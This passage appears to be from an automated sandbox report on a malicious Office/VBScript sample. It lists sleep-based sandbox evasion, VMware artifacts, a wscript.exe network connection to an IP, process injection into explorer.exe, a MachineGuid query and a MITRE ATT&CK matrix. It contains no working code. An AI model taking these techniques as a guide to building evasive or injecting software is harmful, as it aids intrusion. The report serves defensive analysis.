    Source: C:\Windows\explorer.exe TID: 2948Thread sleep time: -120000s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 2948Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 2988Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\System32\wscript.exe TID: 1616Thread sleep time: -120000s >= -30000sJump to behavior
    Source: C:\Windows\System32\wscript.exe TID: 1616Thread sleep time: -60000s >= -30000sJump to behavior
    Source: explorer.exe, 00000007.00000003.2113627897.00000000003AD000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    System process connects to network (likely due to code injection or exploit)Show sources
    Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.27.137.242 187Jump to behavior
    Injects code into the Windows Explorer (explorer.exe)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 2576 base: 50000 value: 01Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 2576 base: 50020 value: 9AJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 2576 base: 7FFFFFD5368 value: 00Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 2804 base: D0000 value: 01Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 2804 base: D0020 value: 9AJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 2804 base: 7FFFFFD9368 value: 00Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 3016 base: 50000 value: 01Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 3016 base: 50020 value: 9AJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 3016 base: 7FFFFFD7368 value: 00Jump to behavior
    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting321Path InterceptionProcess Injection21Masquerading1OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySecurity Software Discovery11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion2Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection21NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting321LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery3VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet